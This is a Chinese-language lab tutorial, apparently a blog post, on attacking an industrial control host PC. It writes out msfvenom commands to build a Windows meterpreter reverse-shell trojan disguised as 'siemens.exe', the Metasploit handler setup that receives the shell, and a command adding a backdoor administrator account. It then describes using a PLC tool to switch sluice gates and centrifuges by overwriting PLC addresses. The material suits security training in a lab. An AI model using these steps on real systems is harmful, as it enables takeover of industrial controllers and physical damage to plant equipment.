一:针对上位机的windows系统制作shell反弹木马

1.在linux里使用工具包中的msfinstall文件安装msf攻击套件(kali操作系统中默认集成该工具),具体步骤如下:
1.使用cd命令进入到工具包文件夹中
2.使用命令赋予安装程序相关权限

 chmod +x msfinstall  

3.使用命令安装msf

./msfinstall 

2.获取攻击机的ip地址及端口
攻入工控上位机获取控制权限实验说明
lo显示为网线连接的网络信息,en0显示的是无线连接的网络信息(后续实验默认使用192.168.199.137为攻击机ip)
3.生成shell回弹木马
如下图在终端中直接输入以下命令生成木马程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.137 LPORT=7777 -f exe -o /Users/co0ontty/siemens.exe  
lhost和lport为攻击机ip和端口
参考Frp使用教程可以实现通过跳板的外网渗透

(lhost为攻击机ip,lport为攻击机接收shell的端口,-o 后的参数需更改为攻击机保存木马的文件夹)
攻入工控上位机获取控制权限实验说明
4.运行msfconsole连接shell
1.终端中直接输入msfconsole使用(第一次输入需要配置数据库,默认全部选择yes)
2.如下图设置exploit和payload

Use exploit/multi/handler  
Set payload windows/meterpreter/reverse_tcp  

3.设置攻击机ip和监听端口

Set lhost 192.168.199.137  
Set lport 7777  

4.运行程序

run  

配置完成如下图所示
攻入工控上位机获取控制权限实验说明
5.获得上位机权限
1.将木马拷贝到上位机中运行(win10及以上系统需要右键使用管理员身份运行)
2.攻击机获得反弹的shell(如下图所示)
攻入工控上位机获取控制权限实验说明
6.新建管理员账户
1.新建账户
攻入工控上位机获取控制权限实验说明
2.将新建的账户提升为管理员

Net localgroup “Administrators” 123 /add  

3.使用远程桌面连接,并使用该账户登陆
7.读取工控设备基本信息
1.打开工控管理软件,双击项目打开项目
2选择打开项目试图选项,进入组态视图(如下图所示)
攻入工控上位机获取控制权限实验说明
3.选择相应plc,打开plc变量选项,双击打开所有变量查看变量表
攻入工控上位机获取控制权限实验说明

二:使用工具修改相关地址变量达到预期效果

下面使用的工具存在于工具包中测试文件夹中(工具包下载地址:https://github.com/co0ontty/Gongkong-Tools.git )
环境配置:
1.运行前请将snap7.dll和snap7.lib拷贝到你的操作系统对应的版本的System32(32位)或SysWOW64(64位)下
2.连通192.168.1.8
一:水闸开关测试
1.打开PLC调试.exe
2.读取I 1.0的参数
3.通过更改I 1.0 的参数值来改变水闸的开关状态(可改变的参数为0和1,默认0为关闭状态1为开启状态)
二:离心机测试
1.打开PLC调试
2.读取Q 2.0,Q 2.1,Q 2.2,Q 2.3 的参数
3.通过更改这四个地址的参数来改变这四个离心机的状态 (可改变的参数为0和1,默认0为关闭状态,1为开启状态)

相关文章:

  • 2022-12-23
  • 2021-05-13
  • 2021-12-04
  • 2021-09-08
猜你喜欢
  • 2021-04-11
  • 2022-12-23
  • 2021-07-19
  • 2021-12-04
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案